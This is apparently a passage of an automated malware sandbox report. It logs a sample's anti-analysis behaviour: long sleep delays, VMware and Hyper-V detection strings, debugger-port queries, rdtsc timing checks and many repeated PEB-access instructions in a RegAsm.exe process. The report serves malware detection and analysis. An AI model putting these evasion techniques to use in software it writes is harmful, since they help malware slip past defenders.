Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3596	Thread sleep count: 214 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3596	Thread sleep count: 277 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3568	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe TID: 3664	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 6488	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: temp_executable.exe, 00000002.00000002.2078582648.0000000001515000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
Source: wscript.exe, 00000000.00000003.2083664464.000001615B716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: wscript.exe, 00000000.00000003.2083664464.000001615B716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\8b}\

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_02CFD1C0 rdtsc

3_2_02CFD1C0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_00417663 LdrLoadDll,

3_2_00417663

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAB2C0 mov eax, dword ptr fs:[00000030h]	3_2_02CAB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A2C3 mov eax, dword ptr fs:[00000030h]	3_2_02C8A2C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C892C5 mov eax, dword ptr fs:[00000030h]	3_2_02C892C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C892C5 mov eax, dword ptr fs:[00000030h]	3_2_02C892C5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B2D3 mov eax, dword ptr fs:[00000030h]	3_2_02C7B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B2D3 mov eax, dword ptr fs:[00000030h]	3_2_02C7B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7B2D3 mov eax, dword ptr fs:[00000030h]	3_2_02C7B2D3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAF2D0 mov eax, dword ptr fs:[00000030h]	3_2_02CAF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CAF2D0 mov eax, dword ptr fs:[00000030h]	3_2_02CAF2D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902E1 mov eax, dword ptr fs:[00000030h]	3_2_02C902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902E1 mov eax, dword ptr fs:[00000030h]	3_2_02C902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902E1 mov eax, dword ptr fs:[00000030h]	3_2_02C902E1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F2F8 mov eax, dword ptr fs:[00000030h]	3_2_02D3F2F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D552E2 mov eax, dword ptr fs:[00000030h]	3_2_02D552E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C792FF mov eax, dword ptr fs:[00000030h]	3_2_02C792FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D312ED mov eax, dword ptr fs:[00000030h]	3_2_02D312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBE284 mov eax, dword ptr fs:[00000030h]	3_2_02CBE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CBE284 mov eax, dword ptr fs:[00000030h]	3_2_02CBE284
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D00283 mov eax, dword ptr fs:[00000030h]	3_2_02D00283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D00283 mov eax, dword ptr fs:[00000030h]	3_2_02D00283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D00283 mov eax, dword ptr fs:[00000030h]	3_2_02D00283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB329E mov eax, dword ptr fs:[00000030h]	3_2_02CB329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB329E mov eax, dword ptr fs:[00000030h]	3_2_02CB329E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55283 mov eax, dword ptr fs:[00000030h]	3_2_02D55283
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902A0 mov eax, dword ptr fs:[00000030h]	3_2_02C902A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C902A0 mov eax, dword ptr fs:[00000030h]	3_2_02C902A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C952A0 mov eax, dword ptr fs:[00000030h]	3_2_02C952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov eax, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov eax, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov ecx, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D092BC mov ecx, dword ptr fs:[00000030h]	3_2_02D092BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D172A0 mov eax, dword ptr fs:[00000030h]	3_2_02D172A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D172A0 mov eax, dword ptr fs:[00000030h]	3_2_02D172A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov ecx, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D162A0 mov eax, dword ptr fs:[00000030h]	3_2_02D162A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D492A6 mov eax, dword ptr fs:[00000030h]	3_2_02D492A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3B256 mov eax, dword ptr fs:[00000030h]	3_2_02D3B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3B256 mov eax, dword ptr fs:[00000030h]	3_2_02D3B256
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB724D mov eax, dword ptr fs:[00000030h]	3_2_02CB724D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79240 mov eax, dword ptr fs:[00000030h]	3_2_02C79240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79240 mov eax, dword ptr fs:[00000030h]	3_2_02C79240
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C86259 mov eax, dword ptr fs:[00000030h]	3_2_02C86259
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7A250 mov eax, dword ptr fs:[00000030h]	3_2_02C7A250
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D30274 mov eax, dword ptr fs:[00000030h]	3_2_02D30274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84260 mov eax, dword ptr fs:[00000030h]	3_2_02C84260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84260 mov eax, dword ptr fs:[00000030h]	3_2_02C84260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C84260 mov eax, dword ptr fs:[00000030h]	3_2_02C84260
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7826B mov eax, dword ptr fs:[00000030h]	3_2_02C7826B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC1270 mov eax, dword ptr fs:[00000030h]	3_2_02CC1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CC1270 mov eax, dword ptr fs:[00000030h]	3_2_02CC1270
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA9274 mov eax, dword ptr fs:[00000030h]	3_2_02CA9274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4D26B mov eax, dword ptr fs:[00000030h]	3_2_02D4D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4D26B mov eax, dword ptr fs:[00000030h]	3_2_02D4D26B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB7208 mov eax, dword ptr fs:[00000030h]	3_2_02CB7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB7208 mov eax, dword ptr fs:[00000030h]	3_2_02CB7208
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55227 mov eax, dword ptr fs:[00000030h]	3_2_02D55227
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7823B mov eax, dword ptr fs:[00000030h]	3_2_02C7823B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3B3D0 mov ecx, dword ptr fs:[00000030h]	3_2_02D3B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C8A3C0 mov eax, dword ptr fs:[00000030h]	3_2_02C8A3C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C883C0 mov eax, dword ptr fs:[00000030h]	3_2_02C883C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3C3CD mov eax, dword ptr fs:[00000030h]	3_2_02D3C3CD
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C903E9 mov eax, dword ptr fs:[00000030h]	3_2_02C903E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D553FC mov eax, dword ptr fs:[00000030h]	3_2_02D553FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB63FF mov eax, dword ptr fs:[00000030h]	3_2_02CB63FF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D3F3E6 mov eax, dword ptr fs:[00000030h]	3_2_02D3F3E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0 mov eax, dword ptr fs:[00000030h]	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0 mov eax, dword ptr fs:[00000030h]	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C9E3F0 mov eax, dword ptr fs:[00000030h]	3_2_02C9E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA438F mov eax, dword ptr fs:[00000030h]	3_2_02CA438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA438F mov eax, dword ptr fs:[00000030h]	3_2_02CA438F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D5539D mov eax, dword ptr fs:[00000030h]	3_2_02D5539D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7E388 mov eax, dword ptr fs:[00000030h]	3_2_02C7E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7E388 mov eax, dword ptr fs:[00000030h]	3_2_02C7E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7E388 mov eax, dword ptr fs:[00000030h]	3_2_02C7E388
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C78397 mov eax, dword ptr fs:[00000030h]	3_2_02C78397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C78397 mov eax, dword ptr fs:[00000030h]	3_2_02C78397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C78397 mov eax, dword ptr fs:[00000030h]	3_2_02C78397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD739A mov eax, dword ptr fs:[00000030h]	3_2_02CD739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CD739A mov eax, dword ptr fs:[00000030h]	3_2_02CD739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB33A0 mov eax, dword ptr fs:[00000030h]	3_2_02CB33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CB33A0 mov eax, dword ptr fs:[00000030h]	3_2_02CB33A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02CA33A5 mov eax, dword ptr fs:[00000030h]	3_2_02CA33A5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D4A352 mov eax, dword ptr fs:[00000030h]	3_2_02D4A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D34C mov eax, dword ptr fs:[00000030h]	3_2_02C7D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C7D34C mov eax, dword ptr fs:[00000030h]	3_2_02C7D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov ecx, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D0035C mov eax, dword ptr fs:[00000030h]	3_2_02D0035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D55341 mov eax, dword ptr fs:[00000030h]	3_2_02D55341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79353 mov eax, dword ptr fs:[00000030h]	3_2_02C79353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02C79353 mov eax, dword ptr fs:[00000030h]	3_2_02C79353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Code function: 3_2_02D02349 mov eax, dword ptr fs:[00000030h]	3_2_02D02349
